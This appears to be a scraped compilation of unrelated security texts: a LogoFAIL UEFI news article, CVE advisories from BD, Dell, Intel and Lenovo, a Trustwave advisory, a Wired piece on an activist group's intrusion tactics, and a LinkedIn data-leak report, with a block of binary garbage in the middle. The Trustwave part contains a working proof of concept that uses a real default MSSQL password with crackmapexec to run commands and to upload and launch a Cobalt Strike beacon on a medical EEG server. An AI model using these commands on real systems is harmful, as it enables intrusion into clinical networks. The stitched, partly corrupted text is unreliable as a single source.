Hundreds of consumer and enterprise-grade x86 and ARM models from various vendors, including Intel, Acer, and Lenovo, are potentially vulnerable to bootkits and takeover.

Source: Tetra Images via Alamy Stock Photo

Researchers have uncovered "LogoFAIL," a set of critical vulnerabilities present in the Unified Extensible Firmware Interface (UEFI) ecosystem for PCs.

Exploitation of the vulnerabilities nullify essential endpoint security measures and provide attackers with deep control over affected systems.

The flaws originate in image-parsing libraries within the boot process, impacting all major device manufacturers on both x86 and ARM-based devices, according to a Binarly Research report that will be officially released at Black Hat Europe in London next week.

The severity of LogoFAIL is exacerbated by its widespread reach, researchers warn, noting that it affects the entire ecosystem, not just individual vendors here and there. The findings were reported via the CERT/CC VINCE system, with anticipated vendor patches scheduled for December 6, in tandem with the Black Hat talk, which is entitled, "LogoFAIL: Security Implications of Image Parsing During System."

**Hijacking the Boot Process With LogoFAIL**

Binarly researchers found that by embedding compromised images in the EFI System Partition (ESP) or unsigned firmware update sections, threat actors can execute malicious code during boot-up, enabling them to hijack the boot process.

This exploitation bypasses crucial security measures like Secure Boot and Intel Boot Guard, facilitating the insertion of a persistent firmware bootkit operating beneath the OS level.

"Because the attacker is getting the privileged code execution into the firmware, it's bypassing the security boundaries by design, like a Secure Boot," explains Alex Matrosov, CEO and founder of Binarly. "The Intel Boot Guard and other trusted boot technologies are not extended in runtime, and after the firmware is verified, it just boots further in the system boot flow."

He says the Binarly Research team originally was experimenting with logo modification on one of the Lenovo devices they have in the lab.

"One day, it suddenly started to reboot after showing the boot logo," he says. "We realized that the root cause of the issue was the change of the original logo, which led to a deeper investigation."

He adds, "In this case, we are dealing with continued exploitation with a modified boot logo image, triggering the payload delivery in runtime, where all the integrity and security measurements happen before the firmware components are loaded.”

This is not the first Secure Boot bypass ever discovered; in November 2022, a firmware flaw was found in five Acer laptop models that could be used to disable Secure Boot and allow malicious actors to load malware; and the BlackLotus or BootHole threats have opened the door to boot process hijacking before. However, Matrosov says that LogoFAIL differs from prior threats because it doesn't break runtime integrity by modifying the bootloader or firmware component.

In fact, he says LogoFAIL is a data-only attack, occurring when malicious input comes from the firmware image or the logo is read from the ESP partition during the system boot process — and thus, it's hard to detect.

"Such an approach with the ESP attack vector leaves zero evidence of the firmware attack inside the firmware itself, since the logo comes from an outside source," he explains.

**Majority of the PC Ecosystem Is Vulnerable**

Devices equipped with firmware from the three major independent BIOS vendors (IBVs), Insyde, AMI, and Phoenix, are susceptible, indicating a potential impact across diverse hardware types and architectures. Between them, the three cover 95% of the BIOS ecosystem, Matrosov says.

In fact, Matrosov says LogoFAIL affects "most devices worldwide," including consumer and enterprise-grade PCs from various vendors —Acer, Gigabyte, HP, Intel, Lenovo, MSI, Samsung, Supermicro, Fujitsu, and "many others."

"The exact list of affected devices is still being determined, but it's crucial to note that all three major IBVs — AMI, Insyde, and Phoenix — are impacted due to multiple security issues related to image parsers they are shipping as a part of their firmware," the Binarly report warned. "We estimate LogoFAIL impacts almost any device powered by these vendors in one way or another."

For its part, Phoenix Technologies published an early security notification this week (now taken down but available as a cache until it goes back up Dec. 6) detailing that the bug (CVE-2023-5058) is present in all versions lower than 1.0.5 of its Phoenix SecureCore Technology 4, which is a BIOS firmware that provides advanced security features for various devices.

"The flaw exists in the processing of user-supplied splash screen during system boot, which can be exploited by an attacker who has physical access to the device," according to the notification, which noted that an updated version is available. "By supplying a malicious splash screen, the attacker can cause a denial-of-service attack or execute arbitrary code in the UEFI DXE phase, bypassing the Secure Boot mechanism and compromising the system integrity."

LogoFAIL is also tracked by Insyde as CVE-2023-40238, and by AMI as CVE-2023-39539 and CVE-2023-39538.

Matrosov says the company is actively collaborating with multiple device vendors to coordinate disclosure and mitigation efforts across the spectrum.

**Firmware Updates Key to Minimizing Risk**

To minimize firmware risk in general, users should stay updated with manufacturer advisories and promptly apply firmware updates, as they often address critical security flaws.

Also, vetting suppliers is a must. "Be picky about the device vendors you rely on daily as personal device or devices across your enterprise infrastructure," Matrosov adds. "Don't blindly trust the vendors, but rather validate the vendor's security promises and identify the gaps across your device inventory and beyond."

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Critical 'LogoFAIL' Bugs Offer Secure Boot Bypass for Millions of PCs

The FACSChorusâ„¢ workstation operating system does not restrict what devices can interact with its USB ports. If exploited, a threat actor with physical access to the workstation could gain access to system information and potentially exfiltrate data.

BD is authorized as a Common Vulnerability and Exposures (CVE) Numbering Authority (CNA) by the CVE® Program. As a CNA, BD is authorized to assign CVE identification numbers to newly discovered vulnerabilities in its software-enabled products, which includes using the Common Weakness Enumeration (CWE™) system to classify vulnerability types and applying the Common Vulnerability Scoring System (CVSS) to communicate vulnerability characteristics and severity.

BD has received no reports of these vulnerabilities being exploited.

BD assigned the following CVSS score to these vulnerabilities:

****1\. CVE-2023-29060 – Lack of USB Whitelisting****

**Vulnerability Description**: The FACSChorus™ workstation operating system does not restrict what devices can interact with its USB ports. If exploited, a threat actor with physical access to the workstation could gain access to system information and potentially exfiltrate data.

**CVSS: 5.4 (Medium)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. Impact to confidentiality and integrity is low, as there is no sensitive data stored on the workstation. The impact to availability is high as user access to the workstation can be disabled.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****2\. CVE-2023-29061 – Lack of Adequate BIOS Authentication****

**Vulnerability Description**: There is no BIOS password on the FACSChorus™ workstation. A threat actor with physical access to the workstation can potentially exploit this vulnerability to access the BIOS configuration and modify the drive boot order and BIOS pre-boot authentication.

**CVSS: 5.2 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The complexity of the attack is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. There is no impact to confidentiality because there is no sensitive data stored on the workstation. There is low impact to integrity because the threat actor cannot modify system information on the local drive. The impact to availability is high as the workstation boot process can be disabled.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****3\. CVE-2023-29062 - Unsecure Identity Verification****

**Vulnerability Description**: The Operating System hosting the FACSChorus application is configured to allow transmission of hashed user credentials upon user action without adequately validating the identity of the requested resource. This is possible through the use of LLMNR, MBT-NS, or MDNS and will result in NTLMv2 hashes being sent to a malicious entity position on the local network. These hashes can subsequently be attacked through brute force and cracked if a weak password is used. This attack would only apply to domain joined systems.

**CVSS: 3.8 (Low)** CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

**Rationale:** An attacker must have access to the system's local network in order for the target to transact with the attack server. The complexity of the attack is low as once network access is attained the attack is repeatable and straightforward. No additional privileges are required to the system, but a successful attack relies on a user to issue a network request on the target system. Because this attack relies on user domain credentials, this compromise could affect access to other systems connected to the same domain, therefore scope is changed. The impact of this attack involves only confidentiality as only a single user's credentials are involved. There is no inherent impact to integrity and availability.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****4\. CVE-2023-29063 – Lack of DMA Access Protections****

**Vulnerability Description**: The FACSChorus™ workstation does not prevent physical access to its PCI express (PCIe) slots, which could allow a threat actor to insert a PCI card designed for memory capture. A threat actor can then isolate sensitive information such as a BitLocker encryption key from a dump of the workstation RAM during startup.

**CVSS: 2.4 (Low)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**Rationale**: The attack vector is physical, as the attacker must be able to access the workstation's internal PCI bus. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other components of the system. The impact to confidentiality is low because the information captured during the OS boot would not contain sensitive data. There is no impact to the integrity and availability of the workstation, as the data capture does not modify the OS and would not disable the workstation.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the Biohacking Village hosted at DEF CON 31.

****5\. CVE-2023-29064 – Hardcoded Secrets****

**Vulnerability Description**: The FACSChorus™ software contains sensitive information stored in plaintext. A threat actor could gain hardcoded secrets used by the application, which include tokens and passwords for administrative accounts.

**CVSS: 4.1 (Medium)** CVSS:3.1AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

**Rationale:** The attack vector is physical as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. Due to the nature of the data contained within the application, the overall impact to data confidentiality is low. Impacts to data integrity and availability are mitigated when backup and restore controls are followed, thus remaining low.

****6\. CVE-2023-29065 – Overly Permissive Access Policy****

**Vulnerability Description**: The FACSChorus™ software database can be accessed directly with the privileges of the currently logged-in user. A threat actor with physical access could potentially gain credentials, which could be used to alter or destroy data stored in the database.

**CVSS: 4.1 (Medium)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other components of the system. The impact to confidentiality, integrity and availability is low because no sensitive data is stored on the workstation.

****7\. CVE-2023-29066 – Incorrect User Management****

**Vulnerability Description**: The FACSChorus™ software does not properly assign data access privileges for operating system user accounts. A non-administrative OS account can modify information stored in the local application data folders.

**CVSS: 3.2 (Low)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

**Rationale**: The attack vector is physical, as the OS is hardened to prevent remote desktop access. Attack complexity is low, and end-user interaction is not required. If exploited, a threat actor with standard OS user access could move or delete files that contain experiment data. FACSChorus™ data does not contain confidential information, so there is no impact to confidentiality. The impact to integrity and availability is low, as the loss of experiment data would not affect the operation of FACSChorus™ software or the workstation.

This vulnerability was reported to BD by security researcher Milind Sunilbhai Purswani during the BD-sponsored Biohacking Village at DEF CON 31.

CVE-2023-29060: BD FACSChorus Vulnerabilities - Software and Workstation


Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32469

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32469

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Update Link

Dell Precision 5820 Tower

BIOS

Versions prior to 2.32.0

2.32.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7820 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7920 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Update Link

Dell Precision 5820 Tower

BIOS

Versions prior to 2.32.0

2.32.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7820 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7920 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

**Acknowledgements**

Dell Technologies would like to thank another1024 for reporting this issue.  
 

**Revision History**

Revision

Date

Description

1.0

2023-11-14

Initial Release

1.1

2023-11-15

Updated the Affected Products and Remediation Table: Added Update Links

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

CVE-2023-32469: DSA-2023-223: Security Update for a Dell Precision Tower BIOS Vulnerability

AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability.

f�:����{}��#���D���?� �~�ˋ������oȬ�0Ŋ���I��~��\_��xR�%�轓����L����齓����P����Jz����\*z�!�ƺ+��p� ��놰^D-�o4�qg C|�o��ͮ\[��RVq�W�"��p=q�r�~�%q��"���K���+\]�.؊����RKִ���k�N�9%��;~�Z����t�yek狽~N\*���s�/��i�=�&-�=l�n��P+������cJY��=܊ۈ{?8Oܓ:M��;К��G'�R �$��\*���x�����Ľ/���%��О�?�mxZ�@+���2b39 Eu���iĽ�'�Iv�U����Q3I���% N�#Ih)�' N�#I��iK�T{��Q�O�T{�P�Ԛ$8��$a\]�p��ZB�$f�k�|��� E�HLxl�1���$��$���IBn�/�C-��.خ$�z�$|�J�IBl�$ ^D�E�5mI�5MO���o%' NǴ$�Ǧ5� �L�\]��OKlҒ$�mҝ$8Ԥ$�w-Cj+�3I��$��O�:M Ip��IBt�\*���$!\\��$�'�O�x�$�/���%' =�}��ܶ�i�MKb�F Eu& a�7��(s�����d���q�wZ����It�ީ�i\[���W�t�䙻�j\_�S�Ժz�I���Y�)�.ǵ������IѲ����

CVE-2023-39535

Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access

CVE-2023-34431

Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access.

CVE-2023-22329

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources
*   Glossary

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-5078: Multi-vendor BIOS Security Vulnerabilities (October 2023) - Lenovo Support US

For the first time, guerrilla animal rights group Direct Action Everywhere reveals a guide to its investigative tactics and toolkit, from spy cams to night vision and drones.

In recent years, the animal liberation group Direct Action Everywhere has carried out some of the most brazen and tech-savvy operations and investigations to ever target the animal agriculture industry. It has rescued pigs, goats, ducks, and chickens from factory farms and slaughterhouses in midnight intrusions; captured virtual reality footage with custom-built 360-degree video rigs inside massive pig barns; and used hidden cameras to record some of the meat industry's most disturbing practices, from the carbon dioxide gas chambers that are increasingly used in pig slaughterhouses to the “ventilation shutdowns” designed to cull thousands of farm animals through overheating and suffocation.

To pull off all those revelatory and often highly controversial actions, Direct Action Everywhere (which uses the abbreviation DxE) has also spent years evolving its toolkit and operational rigor—from communications security and physical stealth, to penetration tactics for getting inside factory farms and slaughterhouses. It has also long maintained a manual of its own methods for those operations. Now, for the first time, it's publicly releasing that guide.

The document is a rare glimpse into the detailed tech and tactics of a group that carries out sophisticated and often illegal acts of intrusion and espionage, turning a playbook that might otherwise be used by spies or thieves into one for grassroots activism. “To spend so much time thinking about the vulnerabilities in these facilities, how to get in, avenues of approach,” says Lewis Bernier, a longtime investigator at DxE who has led or participated in hundreds of operations inside farms and slaughterhouses around the country, “I think it's really changed the way I see security as a whole.”

A note of warning: Despite the “how-to” tone of the guide itself, do not try this at home. DxE investigators frequently face criminal charges, and DxE's critics in the agriculture industry and in law enforcement describe the group as radicals with extreme tactics. Despite the group’s nonviolent approach, the agribusiness trade group WATT Global Media wrote in 2018 that DxE “could very well be the most dangerous animal rights organization out there.” Even some other animal rights organizations have balked at their risky methods, especially given the potential for prison sentences under some US states’ severe laws protecting animal agriculture businesses.

DxE goes as far as to welcome those criminal charges, often willingly identifying themselves after an investigation's findings are released in an effort to draw more attention to their revelations and argue the justice of their cause. In fact, the group's cofounder, Wayne Hsiung, was convicted just last week on a felony charge of conspiracy to commit trespassing related to the removal of ducks and chickens from a California poultry farm. He now potentially faces years in prison.

Bernier says that DxE decided to publicly release its guide, even in the wake of Hsiung’s conviction, to help activists who are already committed to carrying out covert investigations do their work more safely and effectively. “More and more people around the world want to do this stuff, or at least are just interested in how it works,” he says. “I think this guide will offer an opportunity for people to understand what's really involved.”

Drones, Night Vision, and Spy Cams

Much of the guide is focused less on spy tricks and espionage gear than on effective activism: team building, creating a chain of command, understanding the media, logistics, planning, biosecurity to avoid contaminating farms with disease, and creating a “security culture” that avoids the gossip, bragging, prying, and infighting that can lead to operations being blown or infiltrated by law enforcement.

But other elements of the manual offer specific descriptions of surveillance tools like drones, hidden cameras, and thermal and night vision scopes. For stealthy after-hours intrusions into factory farms and other facilities, for instance, the guide describes assigning a team member as a scout, equipped with night vision and thermal imaging tools. The guide specifically names the Sionyx Aurora Sport as its recommended night vision camera for both reconnaissance and capturing images in the dark, but notes that thermal imaging tools like the Flir Scout TK offer its scouts other advantages. Thermal imaging can reveal which parts of a facility are active, the guide notes, given that those buildings will be running heating or fans, and also show from a distance which vehicles outside a building have their engines running or have recently moved, revealed in heat traces on a car or truck's brakes.

This Is the Ops Manual for the Most Tech-Savvy Animal Liberation Group in the US

By Waqas
The hacker responsible for this leak is the same individual who previously leaked databases from InfraGard and Twitter.
This is a post from HackRead.com Read the original post: Hacker Leaks 35 Million Scraped LinkedIn User Records

The scraped LinkedIn database was leaked in two parts: one part contained 5 million user records, while the second part contained 35 million records.

A LinkedIn database, holding the personal information of over 35 million users, was leaked by a hacker operating under the alias USDoD. The database was leaked on the infamous cybercrime and hacker platform, **Breach Forums**.

It is important to note that USDoD is the same hacker responsible for breaching the FBI’s security platform InfraGard last year and disclosing the personal details of 87,000 of its members.

The hacker confirmed in a post on Breach Forums that the most recent LinkedIn database was obtained through **web scraping**. Web scraping is an automated process utilized by software to extract data from websites, primarily for gathering specific information from web pages.

The data was leaked in two parts (Screenshot: Hackread.com)

Regarding the contents of the data, as observed by _Hackread.com_, the database predominantly comprises publicly available information from **LinkedIn** profiles, containing full names and profile bios. Although the database contains millions of email addresses, it’s a relief to note that no passwords are included in the leaked data.

The screenshot below shows email addresses included in the breach belong to high-ranking US government officials and institutions. Additionally, email addresses from various government agencies worldwide have also been identified.

(Screenshot: Hackread.com)

****Legitimacy of LinkedIn Data: Authentic or Fraudulent?****

Troy Hunt of HaveIBeenPwned **analysed** over 5 million accounts from the database and concluded that it includes a mixture of information from various sources such as public LinkedIn profiles, fabricated email addresses, and other sources. Troy emphasizes that while some of the data might be anecdotal or partially fabricated, the people, companies, domains, and many email addresses are real.

_“_Because the conclusion is that there’s a significant component of legitimate data in this corpus, I’ve loaded it into HIBP,_“_ Hunt explained. _“_But because there are also a significant number of fabricated email addresses in there, I’ve flagged it as a spam list which means the addresses won’t impact the scale of anyone’s paid subscription if they’re monitoring domains._“_

The LinkedIn database has been identified and labelled as “scraped and fabricated data” on HIBP

